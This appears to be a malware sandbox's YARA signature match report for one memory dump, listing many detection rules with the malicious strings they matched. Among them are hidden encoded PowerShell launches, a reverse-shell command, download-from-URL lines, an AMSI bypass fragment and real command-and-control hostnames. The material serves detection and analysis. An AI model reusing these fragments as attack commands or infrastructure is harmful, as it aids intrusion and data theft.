- 0x3df17:$s2: CreateObject("Wscript.Shell")
- 0x3c46b:$s3: <% @language="VBScript" %>
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0x3efe:$s1: powershell.exe -nop -w hidden -e
- 0x3c5b8:$s1: powershell.exe -nop -w hidden -e
- 0x3cab1:$s1: powershell.exe -nop -w hidden -e
- 0x3c5dd:$s2: Call Shell(
- 0x3c5ed:$s3: Sub Workbook_Open()
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0x3cd5f:$s1: '* PAYLOAD DATA
- 0x3cd73:$s2: = Shell(
- 0x3cd81:$s3: = Environ("USERPROFILE")
- 0x3cd9e:$s4: '**************************************************************
- 0x3cde2:$s5: ChDir (
- 0x3cdee:$s6: '* MACRO CODE
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0x3cf28:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x3cf76:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0x3cfb3:$s3: .func]::VirtualAlloc(0,
- 0x3cfcf:$s4: .func+AllocationType]::Reserve -bOr [
- 0x3cff9:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0x3d033:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0x3d084:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0x3d0c9:$s8: .func]::CreateThread(0,0,$
- 0x3d0e8:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0x3d11f:$s10: = [System.Convert]::FromBase64String("/
- 0x3d14c:$s11: { $global:result = 3; return }
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0x3d298:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x3d2c1:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0x3d2f2:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0x3d32d:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0x3d36c:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0x3d515:$x1: = new System.Diagnostics.Process();
- 0x3d53d:$x2: .StartInfo.UseShellExecute = true;
- 0x3d564:$x3: , "svchost.exe");
- 0x3d57a:$s4: = Path.GetTempPath();
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0x3f6f:$s1: = CreateObject("Wscript.Shell")
- 0x3d6bd:$s1: = CreateObject("Wscript.Shell")
- 0x3df15:$s1: = CreateObject("Wscript.Shell")
- 0x3abee:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d6e1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3dee4:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d712:$s3: .GetSpecialFolder(2)
- 0x3d72b:$s4: .Write Chr(CLng("
- 0x3d741:$s5: = "4d5a90000300000004000000ffff00
- 0x3d767:$s6: For i = 1 to Len(
- 0x3d77d:$s7: ) Step 2
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0x3c8d7:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x3c91f:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0x3c950:$s3: = RtlMoveMemory(
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0x3cf28:$s1: [DllImport("kernel32.dll")]
- 0x3d8b2:$s1: [DllImport("kernel32.dll")]
- 0x3d8d2:$s2: [DllImport("msvcrt.dll")]
- 0x3d8f0:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0x3d926:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x3d949:$s5: .Length,0x1000),0x3000,0x40)
- 0x3d96a:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0x3d9de:$s7: ::memset([IntPtr]($
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0x3ca93:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0x3db34:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
- 0x3db82:$s2: .concat(".exe");
- 0x3db97:$s3: [0] = "chmod";
- 0x3dbaa:$s4: = Runtime.getRuntime().exec(
- 0x3dbcb:$s5: , 16) & 0xff;
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0x3de98:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0x3abee:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d6e1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3dee4:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df15:$s3: = CreateObject("Wscript.Shell")
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0x3e068:$s1: kernel32.dll WaitForSingleObject),
- 0x3e08f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x3e106:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x3e16c:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x8e6:$s5: = [System.Convert]::FromBase64String(
- 0x3d11f:$s5: = [System.Convert]::FromBase64String(
- 0x3e1af:$s5: = [System.Convert]::FromBase64String(
- 0x3e1d9:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0x3e213:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0xaafb:$s1: WS2_32.dll
- 0x93b8:$s2: ReflectiveLoader
- 0x9421:$s2: ReflectiveLoader
- 0x9839:$s2: ReflectiveLoader
- 0x98b5:$s2: ReflectiveLoader
- 0xd84b:$s2: ReflectiveLoader
- 0xd89b:$s2: ReflectiveLoader
- 0xe30b:$s2: ReflectiveLoader
- 0xe80c:$s2: ReflectiveLoader
- 0xeb1a:$s2: ReflectiveLoader
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | CVE_2017_8759_SOAP_Excel | Detects malicious files related to CVE-2017-8759 | Florian Roth | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x15830:$x1: /\/===\__
- 0x1583e:$x2: ${__/\/==
- 0x1584c:$x3: Catch { }
- 0x1585a:$x4: \_/=} ${_
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0x936a:$x1: \Release\reflective_dll.pdb
- 0x938a:$x2: reflective_dll.x64.dll
- 0x93a5:$s3: DLL Injection
- 0x93b7:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0x9420:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0x97eb:$x1: \ReflectiveDLLInjection-master\
- 0x980f:$s2: reflective_dll.dll
- 0x9a73:$s2: reflective_dll.dll
- 0x9ab4:$s2: reflective_dll.dll
- 0x9826:$s3: DLL injection
- 0x9838:$s4: _ReflectiveLoader@4
- 0x98b4:$s4: _ReflectiveLoader@4
- 0xeb19:$s4: _ReflectiveLoader@4
- 0x9850:$s5: Reflective Dll Injection
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0x9a20:$s1: \Release\inject.pdb
- 0x9a38:$s2: !!! Failed to gather information on system processes!
- 0x980f:$s3: reflective_dll.dll
- 0x9a73:$s3: reflective_dll.dll
- 0x9ab4:$s3: reflective_dll.dll
- 0x9a8a:$s4: [-] %s. Error=%d
- 0x9a9f:$s5: \Start Menu\Programs\reflective_dll.dll
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | VBScript_Favicon_File | VBScript cloaked as Favicon file used in Leviathan incident | Florian Roth | - 0x379:$x1: myxml = '<?xml version=""1.0"" encoding=""UTF-8""?>';myxml = myxml +'<root>
- 0x3c9:$x2: .Run "taskkill /im mshta.exe
- 0x3ea:$x3: <script language="VBScript">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :
- 0x43d:$s1: .ExpandEnvironmentStrings("%ALLUSERSPROFILE%") &
- 0x472:$s2: .ExpandEnvironmentStrings("%temp%") &
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Backdoor_Redosdru_Jun17 | Detects malware Redosdru - file systemHome.exe | Florian Roth | - 0x18174:$x1: %s\%d.gho
- 0x11444:$x2: %s\nt%s.dll
- 0x18182:$x2: %s\nt%s.dll
- 0x18192:$x3: baijinUPdate
- 0x11454:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x181a3:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x181c8:$s2: serviceone
- 0x181d7:$s3: \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#f \x1F#
- 0x18242:$s4: servicetwo
- 0x18251:$s5: UpdateCrc
- 0x1825f:$s6: \x1F#[ \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#
- 0x182ba:$s7: nwsaPAgEnT
- 0x182c9:$s8: %-24s %-15s 0x%x(%d)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth | - 0x110e2:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x18456:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x11132:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x184a6:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x184ef:$x3: TCPConnectFloodThread.target = %s
- 0x18515:$s1: \Program Files\Internet Explorer\iexplore.exe
- 0x18547:$s2: %c%c%c%c%c%c.exe
- 0x1855c:$s3: GET %s%s HTTP/1.1
- 0x18572:$s4: CCAttack.target = %s
- 0x112bd:$s5: Accept-Language: zh-cn
- 0x1858b:$s5: Accept-Language: zh-cn
- 0x185a6:$s6: jdfwkey
- 0x185b2:$s7: hackqz.f3322.org:8880
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth | - 0x2b47:$s1: .CreateObject("WScript.Shell")
- 0x1a467:$s1: .CreateObject("WScript.Shell")
- 0x1a60b:$s1: .CreateObject("WScript.Shell")
- 0x3d30:$p1: powershell.exe
- 0x3d57:$p1: powershell.exe
- 0x3efe:$p1: powershell.exe
- 0x3f3b:$p1: powershell.exe
- 0x56df:$p1: powershell.exe
- 0xd0b0:$p1: powershell.exe
- 0xd20b:$p1: powershell.exe
- 0xd249:$p1: powershell.exe
- 0x1030e:$p1: powershell.exe
- 0x133ee:$p1: powershell.exe
- 0x38d6a:$p1: powershell.exe
- 0x3b774:$p1: powershell.exe
- 0x3bbd0:$p1: powershell.exe
- 0x3c5b8:$p1: powershell.exe
- 0x3cab1:$p1: powershell.exe
- 0x3deca:$p1: powershell.exe
- 0x8e8:$p3: [System.Convert]::FromBase64String(
- 0x3d121:$p3: [System.Convert]::FromBase64String(
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x15f02:$s1: <hta:application windowstate="minimize"/>
- 0x16093:$s1: <hta:application windowstate="minimize"/>
- 0x15f30:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | HTA_Embedded | Detects an embedded HTA file | Florian Roth | - 0x15f02:$s1: <hta:application windowstate="minimize"/>
- 0x16093:$s1: <hta:application windowstate="minimize"/>
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | StoneDrill | Detects malware from StoneDrill threat report | Florian Roth | - 0x3a91f:$s1: Hello dear
- 0x3a92e:$s2: WRZRZRAR
- 0x3a93d:$opa1: 66 89 45 D8 6A 64 FF
- 0x3a94b:$opa2: 8D 73 01 90 0F BF 51 FE
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | StoneDrill_VBS_1 | Detects malware from StoneDrill threat report | Florian Roth | - 0x3aad0:$x1: wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001" sSubKeyName = "Software\Micros
- 0x3ab4e:$x2: ping 1.0.0.0 -n 1 -w 20000 > nul
- 0x3ab73:$s1: WshShell.CopyFile "%COMMON_APPDATA%\Chrome\
- 0x3aba3:$s2: WshShell.DeleteFile "%temp%\
- 0x3abc4:$s3: WScript.Sleep(10 * 1000)
- 0x3abe1:$s4: Set WshShell = CreateObject("Scripting.FileSystemObject") While WshShell.FileExists("
- 0x3ac3b:$s5: , "%COMMON_APPDATA%\Chrome\
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | ZxShell_Jul17 | Detects a ZxShell - CN threat group | Florian Roth | - 0x115a6:$x1: zxplug -add
- 0x115b6:$x2: getxxx c:\xyz.dll
- 0x115cc:$x3: downfile -d c:\windows\update.exe
- 0x115f2:$x4: -fromurl http://x.x.x/x.dll
- 0x11612:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s
- 0x11642:$x6: ZXNC -e cmd.exe x.x.x.x
- 0x1165e:$x7: (bind a cmdshell)
- 0x11674:$x8: ZXFtpServer 21 20 zx
- 0x1168d:$x9: ZXHttpServer
- 0x1169f:$x10: c:\error.htm,.exe|c:\a.exe,.zip|c:\b.zip"
- 0x116ce:$x11: c:\windows\clipboardlog.txt
- 0x116ef:$x12: AntiSniff -a wireshark.exe
- 0x1170f:$x13: c:\windows\keylog.txt
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EternalRocks_taskhost | Detects EternalRocks Malware - file taskhost.exe | Florian Roth | - 0x19abd:$s1: sTargetIP
- 0x19acb:$s2: SERVER_2008R2_SP0
- 0x19ae1:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51
- 0x19b0e:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | BeyondExec_RemoteAccess_Tool | Detects BeyondExec Remote Access Tool - file rexesvr.exe | Florian Roth | - 0x38f02:$x1: \BeyondExecV2\Server\Release\Pipes.pdb
- 0x38f2d:$x2: \\.\pipe\beyondexec%d-stdin
- 0x38f4d:$x3: Failed to create dispatch pipe. Do you have another instance running?
- 0x38f98:$op1: 83 E9 04 72 0C 83 E0 03 03 C8 FF 24 85 80 6F 40
- 0x38fae:$op2: 6A 40 33 C0 59 BF E0 D8 40 00 F3 AB 8D 0C 52 C1
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Disclosed_0day_POCs_injector | Detects POC code from disclosed 0day hacktool set | Florian Roth | - 0x128be:$x1: \Release\injector.pdb
- 0x128d8:$x2: Cannot write the shellcode in the process memory, error:
- 0x12916:$x3: /s shellcode_file PID: shellcode injection.
- 0x12946:$x4: /d dll_file PID: dll injection via LoadLibrary().
- 0x12916:$x5: /s shellcode_file PID
- 0x1297c:$x5: /s shellcode_file PID
- 0x12996:$x6: Shellcode copied in memory: OK
- 0x129b9:$x7: Usage of the injector.
- 0x129d5:$x8: KO: cannot obtain the SeDebug privilege.
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | APT_PupyRAT_PY | Detects Pupy RAT | Florian Roth | - 0xa0de:$x1: reflective_inject_dll
- 0xa15f:$x1: reflective_inject_dll
- 0xa179:$x1: reflective_inject_dll
- 0x3b8f8:$x1: reflective_inject_dll
- 0x3b912:$x2: ImportError: pupy builtin module not found !
- 0x3b943:$x3: please start pupy from either it's exe stub or it's reflective DLLR;
- 0xa132:$x4: [INJECT] inject_dll.
- 0x3b98c:$x4: [INJECT] inject_dll.
- 0x3b9a5:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))
- 0x3ba0c:$op1: 8B 42 0C 8B 78 14 89 5C 24 18 89 7C 24 14 3B FD
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OilRig_Strings_Oct17 | Detects strings from OilRig malware and malicious scripts | Florian Roth | - 0x651:$x1: %localappdata%\srvHealth.exe
- 0x672:$x2: %localappdata%\srvBS.txt
- 0x68f:$x3: Agent Injector\PolicyConverter\Inner\obj\Release\Inner.pdb
- 0x6ce:$x4: Agent Injector\PolicyConverter\Joiner\obj\Release\Joiner.pdb
- 0x70f:$s3: .LoadDll("Run", arg, "C:\\Windows\\
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Suspicious_Script_Running_from_HTTP | Detects a suspicious | Florian Roth | - 0x91a9:$s1: cmd /C script:http://
- 0x91c3:$s2: cmd /C script:https://
- 0x91de:$s3: cmd.exe /C script:http://
- 0x91fc:$s4: cmd.exe /C script:https://
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a supicious VBS script that drops an executable | Florian Roth | - 0x89e:$s5: TVqQAAMAAAAEAA
- 0xf6e3:$s5: TVqQAAMAAAAEAA
- 0x3f6f:$a1: = CreateObject("Wscript.Shell")
- 0x3d6bd:$a1: = CreateObject("Wscript.Shell")
- 0x3df15:$a1: = CreateObject("Wscript.Shell")
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Malware_1 | Detects Industroyer related malware | Florian Roth | - 0x1706d:$s1: haslo.exe
- 0x170ce:$x1: 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 ...
- 0x1711a:$x2: haslo.datCrash
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Portscan_3_Output | Detects Industroyer related custom port scaner output file | Florian Roth | - 0x16ef3:$s1: WSA library load complite.
- 0x16f12:$s2: Connection refused
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Malware_4 | Detects Industroyer related malware | Florian Roth | - 0x177aa:$s2: defragsvc
- 0x177b8:$a1: 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Malware_5 | Detects Industroyer related malware | Florian Roth | - 0x17907:$x1: D2MultiCommService.exe
- 0x17922:$x2: Crash104.dll
- 0x17933:$x3: iec104.log
- 0x17942:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u
- 0x1796f:$s1: Error while getaddrinfo executing: %d
- 0x17999:$s2: return info-Remote command
- 0x179b8:$s3: Error killing process ...
- 0x179d6:$s4: stop_comm_service_name
- 0x179f1:$s5: *1* Data exchange: Send: %d (%s)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | redSails_PY | Detects Red Sails Hacktool - Python | Florian Roth | - 0x3b05:$x1: Gained command shell on host
- 0x3b26:$x2: [!] Received an ERROR in shell()
- 0x3b4b:$x3: Target IP address with backdoor installed
- 0x3b79:$x4: Open backdoor port on target machine
- 0x3ba2:$x5: Backdoor port to open on victim machine
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Rehashed_RAT_2 | Detects malware from Rehashed RAT incident | Florian Roth | - 0x7417:$x1: dalat.dulichovietnam.net
- 0x7434:$x2: web.Thoitietvietnam.org
- 0x7450:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)
- 0x749a:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3
- 0x751f:$s1: GET /%s%s%s%s HTTP/1.1
- 0x753a:$s2: http://%s:%d/%s%s%s%s
- 0x7554:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Pupy_Backdoor | Detects Pupy backdoor | Florian Roth | - 0xa025:$x1: reflectively inject a dll into a process.
- 0xa053:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid
- 0xa094:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null
- 0xa0de:$x4: reflective_inject_dll
- 0xa15f:$x4: reflective_inject_dll
- 0xa179:$x4: reflective_inject_dll
- 0x3b8f8:$x4: reflective_inject_dll
- 0xa053:$x5: ld_preload_inject_dll
- 0xa0f8:$x5: ld_preload_inject_dll
- 0xa112:$x6: get_pupy_config() -> string
- 0xa132:$x7: [INJECT] inject_dll. OpenProcess failed.
- 0xa0de:$x8: reflective_inject_dll
- 0xa15f:$x8: reflective_inject_dll
- 0xa179:$x8: reflective_inject_dll
- 0x3b8f8:$x8: reflective_inject_dll
- 0xa179:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
- 0xa1bc:$x10: linux_inject_main
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Microcin_Sample_5 | Malware sample mentioned in Microcin technical report by Kaspersky | Florian Roth | - 0x4fc6:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary
- 0x5012:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option>
- 0x5051:$x3: The password is "%s" Time: %d(s)
- 0x507e:$x4: The password is " %s " Time: %d(s)
- 0x50ad:$x5: No password found!
- 0x50c4:$x7: Can not found the Password Dictoonary file!
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | clearlog | Detects Fireball malware - file clearlog.dll | Florian Roth | - 0x193c5:$x1: \ClearLog\Release\logC.pdb
- 0x1940a:$s2: logC.dll
- 0x19433:$s5: Logger Name:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf1b4:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf37f:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0xf3aa:$x2: script:https://www.dropbox.com
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0x7d9e:$s1: mshtml,RunHTMLApplication
- 0xf523:$s1: mshtml,RunHTMLApplication
- 0xf541:$s2: new ActiveXObject("WScript.Shell").Run(
- 0xf56d:$s3: /c start mshta j
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0x8dc6:$s1: w = new ActiveXObject(
- 0x8de1:$s2: w.Run(r);
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x2cefa:$s2: Auditcleaner
- 0x2cf61:$s2: Auditcleaner
- 0x32706:$s11: elatedmonkey
- 0x3277a:$s11: elatedmonkey
- 0x2d510:$s17: ys.ratload.sh
- 0x2bc65:$elf4: charm_saver
- 0x2f4b5:$elf8: ebbshave
- 0x2f51d:$elf8: ebbshave
- 0x2f753:$elf9: eggbasket
- 0x2f7bc:$elf9: eggbasket
- 0x319d4:$elf12: envoytomato
- 0x31a3a:$elf12: envoytomato
- 0x317bf:$elf14: estopmoonlit
- 0x31826:$elf14: estopmoonlit
- 0x33021:$elf17: ghost_sparc
- 0x3309e:$elf17: ghost_sparc
- 0x30db6:$elf18: jackpop
- 0x30e1d:$elf18: jackpop
- 0x2a85c:$elf19: orleans_stride
- 0x2ade8:$elf21: seconddate
- 0x2bc65:$pe2: charm_saver
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Ysoserial_Payload_Spring1 | Ysoserial Payloads - file Spring1.bin | Florian Roth | - 0x3e9db:$x1: ysoserial/Pwner
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Ysoserial_Payload | Ysoserial Payloads | Florian Roth | - 0x3eb30:$x1: ysoserial/payloads/
- 0x3eb48:$s1: StubTransletPayload
- 0x3eb60:$s2: Pwnrpw
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Ysoserial_Payload_3 | Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin | Florian Roth | - 0x3ece5:$x1: ysoserialq
- 0x3ecf4:$s1: targetClassInterceptorMetadatat
- 0x3ed18:$s2: targetInstancet
- 0x3ed2c:$s3: targetClassL
- 0x3ed3d:$s4: POST_ACTIVATEsr
- 0x3ed51:$s5: PRE_DESTROYsq
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | CACTUSTORCH | Detects CactusTorch Hacktool | Florian Roth | - 0xc7e4:$x1: $payload = shellcode(%options["listener"], "true", "x86");
- 0xc823:$x2: Copy the base64 encoded payload into the code variable below.
- 0xc886:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
- 0xc8e6:$x5: ' Author: Vincent Yiu (@vysecurity)
- 0xc90e:$x6: Dim binary : binary = "rundll32.exe"
- 0xc937:$a1: code = code & "
- 0xc94b:$a2: serialized_obj = serialized_obj & "
- 0xc91b:$s1: binary = "rundll32.exe"
- 0xc973:$s1: binary = "rundll32.exe"
- 0xc9e4:$s1: binary = "rundll32.exe"
- 0xc98f:$s2: EL.DataType = "bin.hex"
- 0xc9ab:$s3: Set stm = CreateObject("System.IO.MemoryStream")
- 0xc9e0:$s4: var binary = "rundll32.exe";
- 0xca01:$s5: var serialized_obj = "
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth | - 0x3405e:$s1: DoUploadAndExecute
- 0x34075:$s2: DoDownloadAndExecute
- 0x3408e:$s3: DoShellExecute
- 0x340a1:$s4: set_Processname
- 0x340b6:$op1: 04 1E FE 02 04 16 FE 01 60
- 0x340c5:$op2: 00 17 03 1F 20 17 19 15 28
- 0x340d4:$op3: 00 04 03 69 91 1B 40
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth | - 0x34226:$x1: GetKeyloggerLogsResponse
- 0x34243:$x2: get_Keylogger
- 0x34255:$x3: HandleGetKeyloggerLogsResponse
- 0x34278:$s1: DoShellExecuteResponse
- 0x34293:$s2: GetPasswordsResponse
- 0x342ac:$s3: GetStartupItemsResponse
- 0x342c8:$s4: <GetGenReader>b__7
- 0x342df:$s5: RunHidden
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_Malware_2 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x370d2:$x1: sERvEr.Dll
- 0x370f2:$x3: .?AVCKeyLoggerManager@@
- 0x3710e:$x4: GH0STCZH
- 0x37177:$s3: \Release\Loader.pdb
